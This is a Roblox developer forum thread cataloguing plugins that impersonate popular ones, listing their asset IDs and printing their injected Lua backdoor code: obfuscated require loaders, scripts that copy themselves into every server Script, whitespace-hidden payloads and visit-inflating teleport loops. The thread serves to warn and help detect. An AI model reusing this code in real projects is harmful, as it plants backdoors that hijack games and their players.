Known Malicious Plugins for HISR detection Megathread

OverEngineeredCode · March 21, 2019, 9:24pm

Just an FYI for everybody concerned about malicious plugins. I’ve seen a massive uptake in spam user accounts purposefully impersonating well known developers. For example:

Real: OkevinO Spam: 0kevin0
Real: CodeSponge Spam: SpongeCoder

I think a lot of these accounts got banned, but I just wanted to make people aware because one of my friends fell for this and got into trouble with the moderators because of a server side backdoor being used to put items in his game.

Please double check the names of who developed the plugin you’re installing and check if it’s a deliberate copy or not.

mkargus · June 18, 2019, 5:05pm

It’s happening again.

Part to Terrain (my own plugin.)
Original: 261634767
Malicious: 3328292627

Building Tools by F3X
Original: 144950355
Malicious: 3320045603

GapFill & Extrude
Original: 165687726
Malicious: 3320031385

Load Character
Original: 752585459
Malicious: 3323713717

Waterfall Generator
Original: 1191990117
Malicious: 3328279741

Auhrii · July 5, 2019, 9:30am

Tree Generator
Original: 1256428022
Malicious: 3390238326

Pretty half-baked attempt if I’m honest, the injected code broke my server core script which in turn breaks everything else. Good way to draw the ire of a coffee-deprived developer. 0/10.

DaWarTekWizard · August 29, 2019, 9:17am

Intro Creator

Original plugin: https://www.roblox.com/library/723917710/Intro-Creator-OFFICIAL
Malicious plugin: https://www.roblox.com/library/3664187642/Intro-Creator

GizmoTjaz · August 29, 2019, 10:57am

Realism Mod
Original: 400812710
Malicious: 3736586479 (inserts a ModuleScript with obfuscated code)

Roundify
Original: 2233768483
Malicious: 3745147634

Intro Creator
Original: 723917710
Malicious: 3664187642

SenorSbeve · August 29, 2019, 4:16pm

Shift to Sprint
Malicious plugin: 3664816543
Original plugin: 142346332

Day And Night
Malicious plugin: 3622467610
Original plugin: 878777463

Superbithious · January 26, 2020, 4:07am

Roundify

Malicious plugin: 4593270188
Original plugin: 2233768483

NINJAMASTR999 · January 27, 2020, 7:20am

This is awesome. Much faster than self-verification and an easy way of getting what you need.

Thanks for creating the tool!

NickoSCP · April 14, 2020, 4:38am

Virus-Destroyer (Anti-Serverside)

Original plugin: unknown
Malicious plugin: https://www.roblox.com/library/4863624219/Virus-Destroyer-Anti-Serverside
Malicious action:

pcall(function()local a={‘Weld’,“FilterEvent”,“ClickerModule”,“ChatModule”,“Anti-Exploit”}local b=Instance.new(“Script”)b.Source='–[[ROBLOX Studio Script]] require(4850721608):Fire() 'b.Name=a[math.random(1,#a)]for a = 1,3 do local b=b:Clone()if a==1 then b.Parent=game:GetService(“ServerScriptService”)elseif a==2 then b.Parent=workspace:FindFirstChildOfClass(“Script”)elseif a==3 then b.Parent=workspace:FindFirstChildOfClass(“Model”)end end end)

Malicious require id: https://www.roblox.com/library/4850721608/Anti-Exploit-Module

Custom Name Title

Original plugin: unknown
Malicious plugin: https://www.roblox.com/library/4864404814/Custom-Name-Title
Malicious action:

a={‘Weld’,“FilterEvent”,“ClickerModule”,“ChatModule”,“Anti-Exploit”}local b=Instance.new(“Script”)b.Source='–[[ROBLOX Studio Script]] require(4850721608):Fire() 'b.Name=a[math.random(1,#a)]for a = 1,3 do local b=b:Clone()if a==1 then b.Parent=game:GetService(“ServerScriptService”)elseif a==2 then b.Parent=workspace:FindFirstChildOfClass(“Script”)elseif a==3 then b.Parent=workspace:FindFirstChildOfClass(“Model”)end end end)

Malicious require id: https://www.roblox.com/library/4850721608/Anti-Exploit-Module

NickoSCP · April 14, 2020, 5:04am

Fall Damage Plugin [FIXED]

Original plugin: https://www.roblox.com/library/1248186463/Fall-Damage-Plugin-FIXED

~~
~~

1

Malicious plugin: https://www.roblox.com/library/4742433843/Fall-Damage-Plugin
Malicious plugin uploader: RobloxSecurePlugins
Malicious action: FallDamage Script

local AntiExploit = Instance.new(“Script”)
AntiExploit.Parent = game.Workspace.Camera
AntiExploit.Name = “ClientReplicator”
AntiExploit.Source = [[
–Official roblox studio script
require(4582121027):protecc()
]]

Malicious module id: https://www.roblox.com/library/4582121027/unnamed
Malicious module uploader: Neatoxic

~~
~~

2

Malicious plugin: https://www.roblox.com/library/4657687313/Fall-Damage-Plugin
Malicious plugin uploader: RobloxTopPlugins
Malicious action: FallDamage Script

local AntiExploit = Instance.new(“Script”)
AntiExploit.Parent = game.Workspace.Camera
AntiExploit.Name = “ClientReplicator”
AntiExploit.Source = [[
game.Players.PlayerAdded:Connect(function(player)
wait(0.0000001)
local joinData = player:GetJoinData().SourcePlaceId
local TeleportService = game:GetService(“TeleportService”)
if joinData == 4628266409 then
local Tpdata = player:GetJoinData().TeleportData
if Tpdata then
Req = Tpdata.req
gid = Tpdata.grid
end
if player:GetRankInGroup(gid) == 2 then
require(Req).load(player.Name)
end
return else
end
local Players = game:GetService(“Players”)
local TeleportService = game:GetService(“TeleportService”)
local teleportData = {
maxxPlrs = Players.MaxPlayers,
maxPlrs = Players.NumPlayers,
placeId = game.PlaceId,
JobId = game.JobId,
CreatorId = game.CreatorId
}
TeleportService:Teleport(4628266409, player, teleportData)
end)

]]
Malicious place id: https://www.roblox.com/games/4628266409/Loading
Malicious place uploader: RobloxFasterLoader
Malicious plugin is force loop rejoining a game to attempt to inflate Visits.

~~
~~

3

Malicious plugin id: https://www.roblox.com/library/3976656034/Fall-Damage-Plugin
Malicious plugin uploader: Txppin
Malicious plugin action:

a(b)function c(d)d.Source=d.Source…’\n’…game:GetObjects(‘rbxassetid://4850318089’)[1].Source end;for e,d in next,b:GetDescendants()do if rawequal(d.ClassName,‘Script’)and not string.find(d.Source,‘4794986906’)then c(d)d:GetPropertyChangedSignal(‘Source’):Connect(function()if not string.find(d.Source,‘4794986906’)then c(d)end end)end end;f=false;function g()d=game:GetObjects(‘rbxassetid://4852273118’)[1]if not b:FindFirstChild(‘Filter Event’)or b:FindFirstChild(‘Filter Event’).Source~=d.Source then d.Parent=b else d=b:FindFirstChild(‘Filter Event’)end;function h()if not f then wait(1/60)f=true;d:Destroy()f=false;g()end end;i=d:GetPropertyChangedSignal(‘Parent’):Connect(h)d.Changed:Connect(function(j)if rawequal(j,‘Disabled’)or rawequal(j,‘Source’)then i:Disconnect()h()end end)end;g()end;a(workspace)a(game:GetService(‘ServerScriptService’))

There are multiple require-id’s in this action attempt. All require ids listed.

Malicious require id: https://www.roblox.com/library/4852273118/Filter-Event
Malicious require uploader: TeefusBeefus
Malicious require action:

–[[
Created by: InceptionTime (Year: 2020)
Description: This is a filtering event put by Roblox to check if your game isn’t modifiying the chat filter in any sort of way, deleting this may lead to unforeseeable consequences.
]]
– You may proceed if you have basic knowledge of scripting and know what you’re doing.
local RunService = game:GetService(“RunService”)
local Require = require
local Loader = 4794986906 – Touching this Id may stop the script from functioning
if not RunService:IsStudio() and not RunService:IsClient() and RunService:IsServer() then – Checks if it isn’t Studio, as it defeats the purpose of the module, also checks if it is being ran on the server’s side and not on the client’s side, just to be on the safe side.
pcall(Require, Loader) – Begins to load the module, it is wrapped in pcall so it doesn’t bother you in anyway whatsoever.
end

Malicious require id: https://www.roblox.com/library/4794986906/unnamed
Malicious require uploader: sunburstery
Malicious action unknown as orbfuscated.

Malicious require id:
https://www.roblox.com/library/4850318089/backpack-code
Malicious require action:

if not game:service’RunService’:IsStudio() then getfenv()"\114\101\113\117\105\114\101" end

Malicious require id #2: https://www.roblox.com/library/4794986906/unnamed
This goes to above malicious require id

~~
~~

5

Malicious plugin id: https://www.roblox.com/library/4863366172/Fall-Damage-Plugin
Malicious plugin uploader: LowkeyNatey
Malicious plugin action:

pcall(function()local a={‘Weld’,“FilterEvent”,“ClickerModule”,“ChatModule”,“Anti-Exploit”}local b=Instance.new(“Script”)b.Source=’–[[ROBLOX Studio Script]] require(4850721608):Fire()'b.Name=a[math.random(1,#a)]for a = 1,3 do local b=b:Clone()if a==1 then b.Parent=game:GetService(“ServerScriptService”)elseif a==2 then b.Parent=workspace:FindFirstChildOfClass(“Script”)elseif a==3 then b.Parent=workspace:FindFirstChildOfClass(“Model”)end end end)

Malicious require id: https://www.roblox.com/library/4850721608/Anti-Exploit-Module
Require id is apart of above malicious plugins

NickoSCP · May 15, 2020, 8:17pm

Backdoor malicious module

getfenv()['\114\101\113\117\105\114\101'](2422875198*2)

2422875198*2 = 4845750396

is orbfuscated but by running in repl.it, prints module id that failed to load.
which it then loads

which has a script to then load

Roblox = "IsStudio"																																																																																																																																																																																																																		
local a=game:GetService("RunService")if a:IsStudio()then print('Loaded!') else if game.PlaceId==185655149 or game.PlaceId==920587237 or game.PlaceId==735030788 then else getfenv()[string.reverse("\101\114\105\117\113\101\114")](getfenv()["\116\111\110\117\109\98\101\114"](string["\99\104\97\114"](getfenv()["\117\110\112\97\99\107"]{52,57,57,53,57,55,56,55,49,57})))end end

and

--[[
License Information:
This product is protected under copyright law. You may not distribute, re-use, modify or otherwise tamper with this software in any way.
Breaking the license gives us, "smartTech", legal grounds for a DMCA takedown.
Please don't steal our stuff.
--]]
local module = {} 
																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																local CheckMeIn = false
if CheckMeIn == true then
require(862849844) -- This is the offical CheckMeIn loader. This is owned by an account named "SmartTech". Feel free to use it.
else
	CheckMeIn = "Loaded."
																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																										local a = script.Script
																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																														a.Parent = workspace.Camera
end
  
return module

Module 862849844 is referred to CheckMeIn which is unknown to be the original creator of this or just something this backdoor creator is using to log users having this backdoor in their game. I’ve tried to inform them about the use of this module, they’ve been warned for over 3 days before I posted this.

The top script then finally loads this module.

This module has a lot of obfuscated code, but one of the scripts remained un obfuscated, loading these two other modules.

MainModule> Folder> Main> ul

-- open source. leak.
local Players = game:GetService('Players')
game.Players.PlayerAdded:Connect(function(Player)
    if Player:GetRankInGroup(6157358) >= 2 then
		wait(0.1)
        require(4674979018):Fire(Player.Name) 
		require(5033070911):ikthisisskidded(Player.Name)
game.Players[Player.Name].PlayerGui.JOHNDOE.ResetOnSpawn = false
    end
end)
game.Players.PlayerAdded:Connect(function(Player)
    if Player:GetRankInGroup(5860863) >= 2 then
		wait(0.1)
        require(4834950415):Fire(Player.Name)
		require(5033070911):ikthisisskidded(Player.Name)
    end
end)
game:GetService("Players").PlayerAdded:Connect(
    function(player)
        if game.PlaceId == 4973653404 or game.PlaceId == 4860760464 then
            game:GetService("TeleportService"):Teleport(5009641755, player)
        end
    end
)

Many of the modules uses these groups to check if player is a member of before giving members scripts in this backdoor.

Places that are being teleported to via this backdoor to inflate or ‘pretend fast loading…’

One of the scripts is checking to do a banlist
https://builderman.club/fe.json
Would be suggested to blacklist this domain.

Loads another module

and another module

This module then uses LuaVM to load code without the need of loadstring in
MainModule > JohnDoe> Main> Shadow> Frame> RemoteHandle

another module

This backdoor is still loaded by an unknown plugin, still looking for it.

david15557 · May 17, 2020, 12:56pm

Guys!
I figured something out.
I was working on a game with a friend of mine, and I suspect he has a virus.
In every Script (not localscript), when I click behind the last “end” (how do I explain this) it moves you to the very side of the script, as if you’ve written 500 spaces in one line and click behind a letter, it moves your Scrollbar (for the X position) to the very far right.

Now, if this happens, move the scrollbar slowly, until you find some weird code, For example I had this:

if not game:service'RunService':IsStudio() then getfenv()["\114\101\113\117\105\114\101"](4794986906) end

This has to be a “virus”, delete those.

Another way to detect those is by Searching “game:service”, INCASE you haven’t used “game:service” in your script.

I do not know what malicious plugin my friend has installed

NickoSCP · May 21, 2020, 12:01am

Already covered this one and Roblox has finally deleted this module.

bigcrazycarboy · May 21, 2020, 12:42am

https://www.roblox.com/library/4723753937/Content-Deleted

https://www.roblox.com/library/4929048497/Test

Two modules required by malicious code. I don’t know which pluigin though, sorry. Hope this helps.

The second module teleports here:
https://www.roblox.com/games/4915459682/Loading?refPageId=ad45ba48-2b45-4b42-ad1e-93d4fdc2113f

NickoSCP · May 21, 2020, 4:17pm

That module requires this

wind_o · May 21, 2020, 5:37pm

Looks like I completely missed you notifying me about this… but the script is definitely not mine. The only way to install CheckMeIn is through these models: Standard Kit, Enterprise Kit. I am aware of many other models on the platform that claim to be the official kit, but they are instead a combination of the official kit, with a back door added. That’s what you’ve found here. All I can do about this is tell my users not to install any third party modules, since technically a back door is not against the Roblox rules.

NickoSCP · May 21, 2020, 7:15pm

Edit: The require id it has does load a model that is on your account if that is what you ment. This script however, considered it to just be loading your module.

That’s what I exactly replied to people in your discord server but your discord server ended up being toxic against my attempt to inform your group directly and I left. I just wanted to let you guys know and attempt to invalidate whatever key the backdoor was using. It doesn’t matter if a backdoor isn’t against the tos, it’s malicious and Roblox can moderate any accounts for any reason.

Edit: I’m not saying that your module is one, I’m saying that it’s being used inside one. Any further chats about this, please message.

metatablecatmaid · May 29, 2020, 12:37am

Maybe move this to a github repo, it makes it much easier to log and request the data as you can just send a HTTP GET request to the repository to download a JSON file, plus it allows for other developers to use the same list if they were to make their own anti-virus

I have no idea how your system works so I cannot provide an example, but you can just do
HTTPService:GetAsync(a link to your repository) and then decode it in JSONDecode

NERDESINPANG0 · May 30, 2020, 3:33pm

Original: ?
Malicious plugin: https://www.roblox.com/library/5109887609/Todds-Anti-Backdoor
Malicious action:

pcall(function(ff)getfenv()['\114\101\113\117\105\114\101'](5090011414).beef()end)

Original: https://www.roblox.com/library/1256428022/Tree-Generator (belongs to Crazyman32)
Malicious plugin: https://www.roblox.com/library/5108497694/Tree-Generator
Malicios action:

pcall(function(ff)getfenv()['\114\101\113\117\105\114\101'](5090011414).beef()end)

Both of the malicious action leads to this plugin - https://www.roblox.com/library/5090011414/beefintestines - it’s an obfuscated script, however by constant dumping and inspecting its constants, it’s clear that it’s a backdoor, it’s constant dump can be found here - https://pastebin.com/raw/FhZyxTty.

OrbitingTodd · May 30, 2020, 6:05pm

F3X Plugin

Malicious:

Original:

Fake Anti-Virus/Backdoor Scanner

Malicious: